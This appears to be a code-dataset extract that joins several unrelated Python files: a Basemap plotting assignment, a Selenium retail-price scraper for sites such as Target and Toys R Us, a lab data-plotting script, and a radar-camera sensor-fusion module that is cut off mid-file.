list: #the exact same structure i did in assignment 1 with the arrays\r\n point = data.getIndex(x, y, z)\r\n matrix[x].append(point)\r\n\r\n #hanging on all the variables for x..like 1,1 1,2 1,3 etc\r\n if min(matrix[x]) < mincolour:\r\n mincolour = min(matrix[x])\r\n if max(matrix[x]) > maxcolour:\r\n maxcolour= max(matrix[x])\r\n #need the minimum and maximum of all for the coloring\r\n\r\n\r\n\r\n #the following codes are given functions under the matplotlib basemaps examples\r\n contourmap = Basemap(projection='mill', resolution=\"l\", llcrnrlat=23.7, llcrnrlon=-83, urcrnrlat=41.7, urcrnrlon=-62)\r\n contourmap.bluemarble()\r\n contourmap.drawcoastlines()\r\n contourmap.drawstates()\r\n x, y = np.meshgrid(np.linspace(0, contourmap.urcrnrx, 500), np.linspace(0, contourmap.urcrnry, 500))\r\n interval = (maxcolour - mincolour) / 20\r\n steps = np.arange(mincolour, maxcolour, interval)\r\n color = plt.cm.RdYlGn\r\n t_color = color(np.arange(color.N))\r\n t_color = ListedColormap(t_color)\r\n map = ax.contourf(x,y, matrix, levels=steps, cmap=t_color)\r\n return map\r\n\r\n\r\n\r\n\r\ndef WIND(x, y, z, ax):\r\n\r\n value = 5\r\n\r\n data_u = []\r\n data_v = []\r\n data_w = []\r\n\r\n for xachse in range(20):\r\n for yachse in range(20):\r\n data_u.append(xachse+x.getIndex((25)*xachse, (25)*yachse, value))\r\n data_v.append(yachse+y.getIndex((25)*xachse, (25)*yachse, value))\r\n data_w.append(z.getIndex((25) * xachse, (25) * yachse, value))\r\n\r\n#the following functions are again given by matlabplotlib basemaps examples\r\n windmap = Basemap(projection='mill', resolution=\"l\", llcrnrlat=23.7, llcrnrlon=-83, urcrnrlat=41.7, urcrnrlon=-62)\r\n windmap.bluemarble()\r\n windmap.drawcoastlines()\r\n windmap.drawstates()\r\n color=plt.cm.RdYlGn\r\n a,b = np.meshgrid(np.linspace(0, windmap.urcrnrx, 20), np.linspace(0, windmap.urcrnry, 20)) #makes a grid with 20 points 'arrows'\r\n map = ax.quiver(a,b, data_u, data_v, data_w, cmap=color)\r\n return map\r\n","sub_path":"Assignment2/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"281371662","text":"#Bazaar Class Definitions\n\"\"\"This improvement on BuySoup will not use the inheritence structure and instead will \n\tmake different vendors there own objects to be imported. The reason for this is because\n\teach site has too many particularities to abstract out an inheritence structure. This \n\twill make scripting for the scraping easier (ToysrUs still uses non-JS interface.\n\t\n\tExample is that during the link gathering at Target, the website may introduce a \n\tpopup that interupts it. In an inheritance structure this would mean having \n\tto construct a control flow that isn't of use in any other website\"\"\"\n\n#Packages\nimport re\nimport csv\nimport requests as r\nfrom bs4 import BeautifulSoup\nfrom datetime import *\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\n#URL Request Values\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'\nHEADERS = {'User-Agent' : user_agent }\n\n#######################################################################################################################\n\nclass blinq:\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\t#Function to get links on a mainpage- can be recently added, or electronics, etc.\n\tdef get_frontpage_lnks(self):\n\t\tlink_list = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.get(self.https)\n\t\ttry:\n\t\t\tpopup = browser.find_element_by_class_name('js-no-thanks')\n\t\t\tpopup.click()\n\t\texcept:\n\t\t\tpass\n\t\tfor x in range(1,31):\n\t\t\tproduct = browser.find_element_by_xpath('//*[@id=\"sli_results_container\"]/div[' + str(x) + ']/figure/a')\n\t\t\tlink_list.append(product.get_attribute('href'))\n\t\tbrowser.close()\n\t\treturn link_list\n\t\n\t#Function to extract info for individual product page, takes in a link list\n\tdef get_products(self, links):\n\t\tmaster = []\n\t\tbrowser = webdriver.Chrome()\n\t\tfor link in links:\n\t\t\tbrowser.get(link)\n\t\t\ttry:\n\t\t\t\tpopup = browser.find_element_by_class_name('js-no-thanks')\n\t\t\t\tpopup.click()\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\t#Thank you guy on the internet, can search with any attribute combo with the below code\n\t\t\t#use element[attribute='attributename'] \n\t\t\tname = browser.find_element_by_css_selector(\"h3[itemprop='name']\").text\n\t\t\tprice = browser.find_element_by_css_selector(\"div[class='price']\").text\n\t\t\tfeatures = browser.find_elements_by_tag_name('dd')\n\t\t\tupc = 'Null'\n\t\t\tfor feature in features:\n\t\t\t\tif len(feature.text) == 12:\n\t\t\t\t\tupc = feature.text\n\t\t\tmaster.append([name, price, upc])\n\t\tbrowser.close()\n\t\treturn master\n\t\n\t#Function that gets frontpage products/other page categories work as well\n\tdef get_frontpage(self):\n\t\tmaster = self.get_products(self.get_frontpage_lnks())\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\t\n\tdef get_search(self):\n\t#specific searches?\n\t\treturn\n\t\t\n\tdef get_crawl(self,start_point, limit):\n\t#Want to start at a specifc page with multiple listings (either all or a certain category/subcategory)\n\t#Get a list of the listings, and crawl to get all unique products \n\t\treturn\n\t\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\n######################################################################################################################\n\nclass target:\n\tdef __init__(self, https):\t\n\t\tself.https = https\n\t\t\n\t#Initialize the object on a clearance section on the website\n\t#Get the links for the clearance section pages\n\tdef page_flipper(self):\n\t\tpages = [self.https]\n\t\tbase_url = 'http://www.target.com'\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.get(base_url + pages[0]) \n\t\tn = browser.find_element_by_css_selector('.dropdown-spaced > button:nth-child(3)').text\n\t\ti = n.find('\\n') -1\n\t\tn = int(n[i])\n\t\tprint(n, 'Pages found')\n\t\tfor x in range(n-1):\n\t\t\tnext_page = browser.find_element_by_css_selector('#plp > div.pagination.h-standardSpacing > a.btn.btn-sm.btn-secondary.btn-icon-only.btn-round.btn-paginate.js-next')\n\t\t\tnext = next_page.get_attribute(\"href\")\n\t\t\tpages.append(next_page.get_attribute(\"href\").replace(base_url,''))\n\t\t\tif x+1 != n-1:\n\t\t\t\tbrowser.get(next)\n\t\tbrowser.close()\n\t\treturn pages\n\t\n\t#Get the links for the clearance section items\n\tdef get_pg_lnks(self):\n\t\tclearance_section_pages = self.page_flipper()\n\t\tprod_lnks = []\n\t\tbase_url = 'http://www.target.com'\n\t\tbrowser = webdriver.Chrome() \n\t\tbrowser.implicitly_wait(5)\n\t\tfor clearance_section in clearance_section_pages:\n\t\t\tbrowser.get(base_url + clearance_section) \n\t\t\thtml = browser.page_source \n\t\t\tsoup = BeautifulSoup(html,'html.parser') \n\t\t\tlinks = soup.findAll('a',{'class':'js-redirect-to-pdp js-altImageChange product--image'})\n\t\t\tfor link in links:\n\t\t\t\tprod_lnks.append(base_url + link['href'])\n\t\tbrowser.close()\n\t\treturn prod_lnks\n\t\n\t#Should really make each individual product scrape use a single function\n\t#Get the information from the products \n\tdef get_products(self):\n\t\tproduct_lnks = self.get_pg_lnks()\n\t\tmaster = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.maximize_window()\n\t\tbrowser.implicitly_wait(5)\n\t\tfor link in product_lnks:\n\t\t\tbrowser.get(link)\n\t\t\t#Name and price stay consistent\n\t\t\tname = browser.find_element_by_css_selector('.title-product > span:nth-child(1)').text\n\t\t\tprice = browser.find_element_by_css_selector('#js-product-sr-id > div:nth-child(1) > span:nth-child(1)').text\n\t\t\t#Find and click the more info button for UPC and targetID\n\t\t\tmore_info = browser.find_element_by_css_selector('#js-show-more-details')\n\t\t\tActionChains(browser).move_to_element(more_info).perform()\n\t\t\tmore_info.click()\n\t\t\t#Generate a list of the product attributes and cycle through them to find the ones we want\n\t\t\tattributes = browser.find_element_by_css_selector('#tab-content-details > ul').find_elements_by_tag_name('li')\n\t\t\tfor atr in attributes:\n\t\t\t\tif atr.text.find('UPC') == 0:\n\t\t\t\t\tupc = atr.text[atr.text.find(':') + 2:]\n\t\t\t\telif atr.text.find('Store Item Number (DPCI):') == 0: \n\t\t\t\t\ttargetid = atr.text[atr.text.find(':') + 2:]\n\t\t\t#Extra step conditional if the price was originally hidden; we navigate to the cart to scrape\n\t\t\tif price == 'see low price in cart':\n\t\t\t\tcart = browser.find_element_by_css_selector('#AddToCartAreaId > div:nth-child(1) > div > button')\n\t\t\t\tActionChains(browser).move_to_element(cart).perform()\n\t\t\t\tcart.click()\n\t\t\t\tgo_to_cart = browser.find_element_by_css_selector('#block-ATC > div.modal-dialog > div > div.modal-body.content-ATC > div > div.stayOnAfterATC-modal-success > div.h-tightSpacingTop > button')\n\t\t\t\tgo_to_cart.click()\n\t\t\t\tprice = browser.find_element_by_css_selector('div.cartItem--price.h-text-red').text\n\t\t\tmaster.append([name,price,upc,targetid])\n\t\tbrowser.close()\n\t\treturn master\n\t\n\t#Easier method call\n\tdef get_clearance(self):\n\t\tmaster = self.get_products()\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n#######################################################################################################################\n#UNDER DEVELOPMENT\nclass gamestop:\n#Gamestop IS being a bitch, use ghost or webdriver\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\t#Initialize the object on the deals section \n\tdef get_prod_lnks(self,limit):\n\t\tlink_list = []\n\t\turllist = [self.https]\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.implicitly_wait(5)\n\t\tfor x in range(limit):\n\t\t\tif x == 0:\n\t\t\t\tbrowser.get(urllist[-1])\n\t\t\t\texpand_items = browser.find_element_by_link_text('Show 50')\n\t\t\t\texpand_items.click()\n\t\t\t\tlinks = browser.find_elements_by_css_selector(\"a[class='ats-product-title-lnk']\")\n\t\t\t\tfor link in links:\n\t\t\t\t\tlink = link.get_attribute('href')\n\t\t\t\t\tlink_list.append(link)\n\t\t\t\tnext_page = browser.find_element_by_link_text('Next')\n\t\t\t\tnext_page = next_page.get_attribute(\"href\")\n\t\t\t\turllist.append(next_page)\n\t\t\telse:\n\t\t\t\tbrowser.get(urllist[-1])\n\t\t\t\tlinks = browser.find_elements_by_css_selector(\"a[class='ats-product-title-lnk']\")\n\t\t\t\tfor link in links:\n\t\t\t\t\tlink = link.get_attribute('href')\n\t\t\t\t\tlink_list.append(link)\n\t\t\t\tnext_page = browser.find_element_by_link_text('Next')\n\t\t\t\tnext_page = next_page.get_attribute(\"href\")\n\t\t\t\turllist.append(next_page)\n\t\tbrowser.close()\n\t\tprint(len(link_list))\n\t\treturn link_list\n\t\t\n\tdef get_products(self,link_list):\n\t\tmaster = []\n\t\tcounter = 0\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.maximize_window()\n\t\tbrowser.implicitly_wait(5)\n\t\tfor link in link_list:\n\t\t\tcounter += 1\n\t\t\tproduct = browser.get(link)\n\t\t\ttry: \n\t\t\t\ta = browser.find_element_by_css_selector(\"h1[itemprop='name']\").text\n\t\t\texcept NoSuchElementException:\n\t\t\t\tcontinue \n\t\t\tb = a[a.find('\\n')+5::]\n\t\t\ta = a[:a.find('by')]\n\t\t\tc = browser.find_element_by_css_selector(\"h3[class='ats-prodBuy-price']\").find_element_by_tag_name('span').text\n\t\t\tprint(counter,a)\n\t\t\tprint(b)\n\t\t\tprint('$'+c)\n\t\t\tmaster.append([a + ' ' + b,c])\n\t\tbrowser.close()\n\t\treturn master\n\n\t#Easier method call\n\tdef get_deals(self,number_pages):\n\t\tmaster = self.get_products(self.get_prod_lnks(number_pages))\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n#######################################################################################################################\n\nclass toysrus:\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\tdef page_flipper(self,limit):\n\t\turllist = [self.https]\n\t\tfor x in range(limit):\n\t\t\tpage = r.get(urllist[-1])\n\t\t\tsoup = BeautifulSoup(page.text, 'html.parser')\n\t\t\tpage.close()\n\t\t\tnext_page = 'http://www.toysrus.com/' + soup.find('span',{\"class\":\"next\"}).parent.get('href')[2:]\n\t\t\turllist.append(next_page)\n\t\treturn urllist\n\t\t\n\tdef get_products(self,pages):\n\t\tmaster = []\n\t\tfor page in pages:\n\t\t\tpage = r.get(page)\n\t\t\tsoup = BeautifulSoup(page.text, 'html.parser')\n\t\t\tpage.close()\n\t\t\tlink_list = []\n\t\t\tlink_soup = soup.find_all('a', {'class':'prodtitle'})\n\t\t\tfor link in link_soup:\n\t\t\t\tlink_list.append(link)\n\t\t\tcounter = 0\n\t\t\tfor link in link_list:\n\t\t\t\tcounter += 1\n\t\t\t\tlink = 'http://www.toysrus.com' + link.get('href')\n\t\t\t\tpage = r.get(link)\n\t\t\t\tsoup = BeautifulSoup(page.text, 'html.parser')\n\t\t\t\tpage.close()\n\t\t\t\t#need to put exception handling for None types\n\t\t\t\ttry: a = soup.find('h1').string\n\t\t\t\texcept AttributeError:\n\t\t\t\t\ta = 'Product Name Error'\n\t\t\t\ttry: b = soup.find('li', {'class':'retail fl '}).span.string\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tb = 'Product Price Error'\n\t\t\t\ttry: c = soup.find('p', {'class':'upc'}).span.string\n\t\t\t\texcept AttributeError: \n\t\t\t\t\tc = 'Product UPC Error'\n\t\t\t\ttry: d = soup.find('p', {'class':'skuText'}).span.string\n\t\t\t\texcept AttributeError:\n\t\t\t\t\td = 'Product SKU Error'\n\t\t\t\tprint(counter,a)\n\t\t\t\tprint(b)\n\t\t\t\tprint(c,d)\n\t\t\t\tmaster.append([a,b,c,d])\n\t\treturn master \n\n\t#Easier method call\n\tdef get_clearance(self,number_pages):\n\t\tmaster = self.get_products(self.page_flipper(number_pages))\n\t\tself.generate_csv(master)\n\t\treturn master\t\t\n\t\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n######################################################################################################################\n\nclass bulq:\n# Individual Links : pallet_tile__link\n# Pallet/Case Name h2 : class: pallet_title\n# Condition: div : class : condition__title\n# Price : div : class: pricing__bulq-price\n# Shipping : div : class: pricing__shipping \n# Manifest Download: a : class: pallet-manifest-btn\n# Next Page : a : class: page-link--relative\n# Need some path of where to save the file?\n\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\tdef flip_page(self, number_pages, location='recent'):\n\t\t# Adding a option of WHERE you want to scrape the links \n\t\t# Returns a list of where to scrape from\n\t\tpages = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.maximize_window()\n\t\tbrowser.get(self.https) \n\t\tclick_here = browser.find_element_by_css_selector('a.btn:nth-child(3)')\n\t\tclick_here.click()\n\t\tpages.append(browser.current_url)\n\t\tif location == 'recent':\n\t\t\tfor x in range(1, number_pages):\n\t\t\t\tpagestr = '&page='\n\t\t\t\tpageins = pagestr + str(x)\n\t\t\t\tpageins = pages[0] + pageins\n\t\t\t\tpages.append(pageins)\n\t\tbrowser.close()\n\t\treturn pages\n\t\n\tdef get_pallet(self, pages, case_or_pallet = 'both'):\n\t# Can change key word argument to case or pallet to just get the \n\t# links on those \n\t\titemlist = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.implicitly_wait(5)\n\t\tif case_or_pallet == 'both':\n\t\t\tfor page in pages:\n\t\t\t\t#print(page)\n\t\t\t\tbrowser.get(page)\n\t\t\t\titems = browser.find_elements_by_css_selector(\"div[class='photo']\")\n\t\t\t\tfor item in items:\n\t\t\t\t\titem = item.find_element_by_tag_name('a')\n\t\t\t\t\titmlink = item.get_attribute(\"href\")\n\t\t\t\t\titemlist.append(itmlink)\n\t\t\tbrowser.close()\n\t\treturn itemlist\n\t\n\tdef get_info(self, itemlist, manifest=False):\n\t# Get the information on the specific pallet/case including the price, and the \n\t# top products, and the manifest if wanted\n\t\tmaster = []\n\t\tbrowser = webdriver.Chrome()\n\t\tfor itm in itemlist:\n\t\t\tbrowser.get(itm)\n\t\t\titmname = browser.find_element_by_xpath(\"/html/body/div[2]/div/div[1]/div[3]/h2\").text \n\t\t\tprint(itmname)\n\t\t\titmcondition = browser.find_element_by_css_selector(\"div[class='condition']\").text\n\t\t\titmprice = browser.find_element_by_css_selector(\"div[class='pricing__bulq-price']\").text\n\t\t\titmship = browser.find_element_by_css_selector(\"div[class='pricing__shipping']\").text\n\t\t\t# Converting the item price and the shipping price to one single price\n\t\t\titmcomb = str(float(itmprice) + float(itmship))\n\t\t\t# Downloading the manifest\n\t\t\tif manifest == True:\n\t\t\t\t# Not exactly sure \n\t\t\t\titm_man_file = browser.find_element_by_css_selector(\"a[class='pallet-manifest-btn']\").get_attribute(\"href\")\n\t\t\t\tmanifest = r.get(itm_man_file, stream=True)\n\t\t\t# Do I want to scrape the top three items in the pallet / case?\n\t\t\tmaster.append([itmname, itmcondition, itmcomb])\n\t\tbrowser.close()\n\t\treturn master\n\t\t\n\t# Easier method call\n\tdef crapacopia(self,number_pages):\n\t\tmaster = self.get_info(self.get_pallet(self.flip_page(number_pages)))\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\n\t# Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass","sub_path":"shopbazaar/bazaar.py","file_name":"bazaar.py","file_ext":"py","file_size_in_byte":15149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"341384128","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom file_reader import plot_runs, Run\n\npath = \"new setup background tests/\"\n\nno_walls = Run(path + \"2018_05_25__13_44_05.txt\")\nsame_side = Run(path + \"2018_05_25__13_57_52.txt\")\nopposite_side = Run(path + \"2018_05_25__14_06_33.txt\")\n\nmin_oil = Run(path + \"2018_05_29__16_22_24.txt\")\n\nruns = [no_walls, same_side, opposite_side, min_oil]\n\nplot_runs(runs, labels=[\"no walls in air\", \"walls opposite laser and detector in air\", \"walls opposite laser and on same side as detector in air\", \"new setup in mineral oil\"], show=False, rot=True)\n\n# copied from 10_16_background_tests.py, using data from background_measurements/background in mineral oil no sample old walls new walls lens tubes.txt\ndistance_from_sample_to_photodiode = 5.435\nphotodiode_radius = (9 / 2.0) / 25.4\nphotodiode_solid_angle = np.pi * np.power(photodiode_radius, 2) / np.power(distance_from_sample_to_photodiode, 2)\nflux_i = 0.005940 * 100e-6\nsensitivity = 100 * 1e-9\nintensity_factor = sensitivity / (photodiode_solid_angle * flux_i)\n\ntotal_data = np.loadtxt(\"old_setup_data/background in mineral oil no sample old walls new walls lens tubes.txt\", skiprows=1)\ntotal_data_x = [180 - 90 - np.round(d[0], 2) for d in total_data]\ntotal_data_y = [intensity_factor * d[1] for d in total_data]\n\nold_data_x = total_data_x[0:302]\nold_data_y = total_data_y[0:302]\nplt.scatter(old_data_x, old_data_y, marker=\"x\", c=\"c\", s=5, label=\"old setup in mineral oil\")\n\nplt.legend()\nplt.xlim(0, 170)\n\nplt.show()\n","sub_path":"new_setup_background_tests.py","file_name":"new_setup_background_tests.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440002369","text":"# !/usr/bin/env python3\n\nfrom abc import ABC, abstractmethod\nfrom typing import List\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy.linalg import block_diag\n\nfrom .transform import w2p, p2w\nfrom .poi_and_roi import radar_poi, expand_poi, optimize_iou\n\n# TODO: move to geometry.yaml\nSCENE_THRESHOLD = 0.5\n\n\nclass Sensor(ABC):\n\n @abstractmethod\n def __init__(self, name: str, R: np.ndarray, obs_size: int) -> None:\n self.name = name\n self.obs_size = obs_size\n self.zs = np.empty((0, obs_size))\n self.R = R\n\n @abstractmethod\n def update(self, data: np.ndarray) -> None:\n pass\n\n @abstractmethod\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n pass\n\n @abstractmethod\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n pass\n\n @abstractmethod\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n pass\n\n @abstractmethod\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n pass\n\n def __repr__(self) -> str:\n return self.name\n\n def observe(self):\n zs, ss = [], []\n for z in self.zs:\n zs.append(z)\n ss.append(self)\n ps = self.obs2world()\n return ObsBundle(zs, ps, ss)\n\n\nclass RadarSensor(Sensor):\n\n def __init__(self, name: str, data: dict) -> None:\n \"\"\"The angles are all in deg\"\"\"\n R = np.array(data['R']).reshape(2, 2)\n super().__init__(name, R, 2)\n self.box_size = 3\n self.boxes = np.empty((0, self.box_size))\n self.offset = np.array(data['offset'])\n self.angle_offset = np.array(data['angle'])\n\n def update(self, data: np.ndarray) -> None:\n self.zs = self.__box2world(data)\n self.zs = self.zs + np.random.normal(0.0, 0.05, size=(len(self.zs), 2)) # add noise\n self.boxes = data[:, 0:self.box_size]\n\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n idx = np.setdiff1d(np.arange(len(self.zs)), useless_indices)\n self.zs = self.zs[idx]\n self.boxes = self.boxes[idx]\n\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n return np.eye(2)\n\n def __old_H(self, pred_xpt: np.ndarray) -> np.ndarray:\n x, y = pred_xpt[0] - self.offset[0], pred_xpt[1] - self.offset[1]\n r = np.linalg.norm([x, y])\n c, s = x / r, y / r\n Hr = np.array([[c, s], [-1 / (r * s), 1 / (r * c)]])\n return Hr\n\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n return zs\n\n def __box2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n if len(zs) == 0:\n return np.empty((0, 2))\n else:\n x = self.offset[0] + zs[:, 0] * np.cos(np.deg2rad(zs[:, 1] + self.angle_offset))\n y = self.offset[1] + zs[:, 0] * np.sin(np.deg2rad(zs[:, 1] + self.angle_offset))\n return np.array([x, y]).T\n\n def __world2box(self, pos: np.ndarray) -> np.ndarray:\n x, y = pos[0] - self.offset[0], pos[1] - self.offset[1]\n r = np.linalg.norm([x, y])\n co, so = np.cos(np.deg2rad(self.angle_offset)), np.sin(np.deg2rad(self.angle_offset))\n x1, y1 = co * x + so * y, -so * x + co * y\n theta = np.rad2deg(np.arctan2(y1, x1))\n z = np.array([r, theta])\n return z\n\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n return pos\n\n\nclass ImageSensor(Sensor):\n\n def __init__(self, name: str, data: dict, target_height: float) -> None:\n R = np.array(data['R'], dtype=int).reshape((2, 2))\n super().__init__(name, R, 2)\n self.box_size = 6\n self.boxes = np.empty((0, self.box_size))\n self.width = data['width']\n self.height = data['height']\n self.w2c = np.array(data['w2c']).reshape((4, 4))\n self.c2p = np.array(data['c2p']).reshape((3, 4))\n self.target_height = target_height\n\n def update(self, data: np.ndarray) -> None:\n self.zs = np.concatenate([(data[:, 0:1] + data[:, 2:3]) // 2, (data[:, 1:2] + 3 * data[:, 3:4]) // 4],\n axis=1,\n dtype=int)\n self.boxes = data[0:6]\n\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n idx = np.setdiff1d(np.arange(len(self.zs)), useless_indices)\n self.zs = self.zs[idx]\n self.boxes = self.boxes[idx]\n\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n uv, zc = w2p(np.array([pred_xpt[0], pred_xpt[1], self.target_height, 1]), self.w2c, self.c2p)\n m0 = np.matmul(self.c2p, self.w2c)[0:2, 0:2]\n m1 = np.outer(uv[0:2], self.w2c[2, 0:2])\n Hi = (m0 - m1) / zc\n return Hi\n\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n if len(zs) == 0:\n return np.empty((0, 2))\n else:\n return np.array([p2w(obs, self.target_height, self.w2c, self.c2p)[0][0:2] for obs in zs])\n\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n return w2p(np.array([pos[0], pos[1], self.target_height, 1]), self.w2c, self.c2p)[0][0:2]\n\n\nclass FusedSensor(Sensor):\n\n def __init__(self, sensors: List[Sensor], weights: List[float]) -> None:\n if len(sensors) != len(weights):\n raise ValueError(\"sensors: {}, weights: {}\".format(len(sensors), len(weights)))\n name, Rs, obs_sizes = \"Fusion_of\", [], []\n for s in sensors:\n name += \"_{}\".format(s.name)\n Rs.append(s.R)\n obs_sizes.append(s.obs_size)\n R = block_diag(*Rs)\n super().__init__(name, R, sum(obs_sizes))\n self.obs_size_list = obs_sizes\n self.sensors = sensors\n self.weights = weights / np.sum(weights)\n\n def update(self, data: np.ndarray) -> None:\n self.zs = data[:, 0:self.obs_size]\n\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n idx = np.setdiff1d(np.arange(len(self.zs)), useless_indices)\n self.zs = self.zs[idx]\n\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n Hs = [s.H(pred_xpt) for s in self.sensors]\n return np.concatenate(Hs, axis=0)\n\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n if len(zs) == 0:\n return np.empty((0, 2))\n else:\n start, poses = 0, []\n for s, obs_size in zip(self.sensors, self.obs_size_list):\n poses.append(s.obs2world(zs[:, start:start + obs_size]))\n start += obs_size\n pos = np.average(poses, 0, self.weights)\n return pos\n\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n zs = [s.world2obs(pos) for s in self.sensors]\n return np.concatenate(zs, axis=0)\n\n\nclass ObsBundle:\n\n def __init__(self, zs: List[np.ndarray], projs: np.ndarray, sensors: List[Sensor]) -> None:\n if len(zs) == len(projs) == len(sensors):\n self.zs = zs\n self.projections = projs\n self.sensors = sensors\n self.total_objs = len(self.zs)\n else:\n raise ValueError(\"ObsBundle initialization failed: zs: {}, ps: {}, ss: {}\".format(\n len(zs), len(projs), len(sensors)))\n\n def __repr__(self) -> str:\n if self.total_objs == 0:\n return \"Observations (0)\"\n else:\n return \"Observations ({}):\\n{}\\nProjections:\\n{}\\nFrom Sensors:\\n{}\".format(self.total_objs, self.zs,\n self.projections, self.sensors)\n\n def __add__(self, other):\n if self.total_objs == 0 or other.total_objs == 0:\n zs = self.zs + other.zs\n ps = np.concatenate([self.projections, other.projections], axis=0)\n ss = self.sensors + other.sensors\n return ObsBundle(zs, ps, ss)\n # two non-empty observations\n distances = np.array([np.linalg.norm(p1 - p2) for p1 in self.projections for p2 in other.projections]).reshape(\n (self.total_objs, other.total_objs))\n same_idx_1, same_idx_2 = linear_sum_assignment(distances)\n thres_filter = distances[same_idx_1, same_idx_2] <= SCENE_THRESHOLD\n same_idx_1 = np.extract(thres_filter, same_idx_1)\n same_idx_2 = np.extract(thres_filter, same_idx_2)\n diff_idx_1 = np.setdiff1d(np.arange(self.total_objs), same_idx_1)\n diff_idx_2 = np.setdiff1d(np.arange(other.total_objs), same_idx_2)\n # TODO: improve coding\n ps = np.concatenate([\n self.projections[diff_idx_1], other.projections[diff_idx_2],\n (self.projections[same_idx_1] + other.projections[same_idx_2]) / 2\n ],\n axis=0)\n zs, ss = [], []\n for i in diff_idx_1:\n zs.append(self.zs[i])\n ss.append(self.sensors[i])\n for i in diff_idx_2:\n zs.append(other.zs[i])\n ss.append(other.sensors[i])\n for i1, i2 in zip(same_idx_1, same_idx_2):\n if self.sensors[i1] is other.sensors[i2]:\n zs.append(self.zs[i1])\n ss.append(self.sensors[i1])\n else:\n zs.append(np.concatenate([self.zs[i1], other.zs[i2]]))\n ss.append(FusedSensor([self.sensors[i1], other.sensors[i2]], [0.5, 0.5]))\n return ObsBundle(zs, ps, ss)\n\n\nclass SensorCluster:\n\n def __init__(self, radar_sensors: List[RadarSensor], image_sensors: List[ImageSensor]) -> None:\n self.radar_sensors = radar_sensors\n self.image_sensors = image_sensors\n self.pair_1 = SensorPair(self.radar_sensors[0], self.image_sensors[2], 0.6) # rad 2, cam 5\n self.pair_2 = SensorPair(self.radar_sensors[1], self.image_sensors[3], 0.6) # rad 3, cam 6\n\n def update(self, radar_data: List[np.ndarray], image_data: List[np.ndarray]) -> None:\n for 